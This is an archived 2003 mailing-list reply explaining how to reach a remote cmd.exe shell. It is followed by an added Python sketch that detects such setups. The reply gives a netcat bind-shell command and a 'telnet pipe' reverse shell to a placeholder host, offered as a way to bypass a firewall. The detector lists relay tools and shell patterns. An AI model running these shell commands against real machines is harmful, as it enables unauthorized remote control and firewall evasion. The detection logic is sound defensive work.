Re: How does one connect to a shell (cmd.exe) bound to a port on a remote machine?

From: DownBload (downbload_at_hotmail.com)
Date: 11/08/03

  • Next message: Golden_Eternity: "RE: How does one connect to a shell (cmd.exe) bound to a port on a remote machine?"
    Date: 8 Nov 2003 10:20:41 -0000
    To: security-basics@securityfocus.com
    
    
    In-Reply-To: <20031106153902.26988032.mspencer@evidentdata.com>

    >From: "Mark G. Spencer" <mspencer@evidentdata.com>
    >I've been looking at some perl scripts that purport to create cmd.exe shells bound to a tcp port on a remote machine. I'm curious, how would someone connect to these shells? The code looks very compact, I wouldn't imagine you could just http to the port bound with cmd.exe? Perhaps telnet? Is this how Code Red and Nimda were operating?

    The best tool for such things is NetCat.
    Just run it as 'nc.exe -l -v -p 31337 -e cmd.exe' and you will have a shell on TCP port 31337. When you want to connect to that host and port, use NetCat again, but now as 'nc.exe remote_host.com 31337', and you have a shell.

    In some cases (like with firewalled machines) you can use the "telnet pipe" technique to bypass the firewall.

    First run two instances of nc.exe on your machine, like this:
    nc.exe -l -v -p 31337
    nc.exe -l -v -p 31338
    (each in a separate window)

    Now on the remote machine do something like "telnet your_host.com 31337 | cmd.exe | telnet your_host.com 31338"
    Write commands in the first window on your machine, and the output will be in the second window.

    ------------------------------------
    DownBload / Illegal Instruction Labs
    Security Research & Education
    http://www.ii-labs.org
    e-mail:downbload[at]hotmail.com
      , ,
     /| |\
     \\.....// "Born under the lucky star magical,
      |.\ /.| but on this earth generally tragical."
       \\^//
        o_o
         `
    Check our wargame: http://www.ii-labs.org/wargame/
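
Seen from the monitoring side, both setups described in this message leave recognisable process-creation records. The sketch below is an added example, not part of the original post: it flags them in constructed sample events whose field names (`image`, `parent`, `cmdline`) are assumptions.

```python
import re

# Constructed process-creation records (field names are assumptions, loosely
# modelled on Windows 4688 / Sysmon event 1); not data from the original post.
SAMPLE_EVENTS = [
    {"image": "nc.exe", "parent": "cmd.exe",
     "cmdline": "nc.exe -l -v -p 31337 -e cmd.exe"},
    {"image": "cmd.exe", "parent": "nc.exe", "cmdline": "cmd.exe"},
    {"image": "cmd.exe", "parent": "explorer.exe",
     "cmdline": 'cmd.exe /c "telnet your_host.com 31337 | cmd.exe | telnet your_host.com 31338"'},
    {"image": "nc.exe", "parent": "cmd.exe", "cmdline": "nc.exe -v -z 10.0.0.5 80"},
    {"image": "telnet.exe", "parent": "cmd.exe", "cmdline": "telnet router.example 23"},
]

SHELLS = {"cmd", "cmd.exe", "powershell", "powershell.exe"}
RELAYS = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe",
          "telnet", "telnet.exe"}

def base(token):
    """Lower-cased file name of a token, with quotes and any path removed."""
    return re.split(r"[\\/]", token.strip('"').lower())[-1]

def names(text):
    """Set of normalised token names appearing in a command-line fragment."""
    return {base(t) for t in text.split()}

def classify(event):
    """Return the reasons an event looks like a shell wired to a socket."""
    reasons = []
    tokens = event["cmdline"].split()
    # 1. "<relay> ... -e <shell>": the relay hands the socket to the shell.
    if tokens and base(tokens[0]) in RELAYS:
        if any(t == "-e" and base(n) in SHELLS for t, n in zip(tokens, tokens[1:])):
            reasons.append("exec-shell-on-socket")
    # 2. "<relay> | <shell> | <relay>": shell stdin/stdout piped to two sockets.
    stages = event["cmdline"].split("|")
    for prev, mid, nxt in zip(stages, stages[1:], stages[2:]):
        if names(mid) & SHELLS and names(prev) & RELAYS and names(nxt) & RELAYS:
            reasons.append("shell-between-network-pipes")
    # 3. Process ancestry: a shell whose parent is a network relay tool.
    if base(event["image"]) in SHELLS and base(event["parent"]) in RELAYS:
        reasons.append("shell-child-of-relay")
    return reasons

def scan(events):
    """Map event index -> reasons, for events with at least one hit."""
    return {i: r for i, e in enumerate(events) if (r := classify(e))}
```

The ancestry rule catches a renamed command line as long as the parent image is still a known relay; a renamed relay binary would need hash or behaviour-based matching instead.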
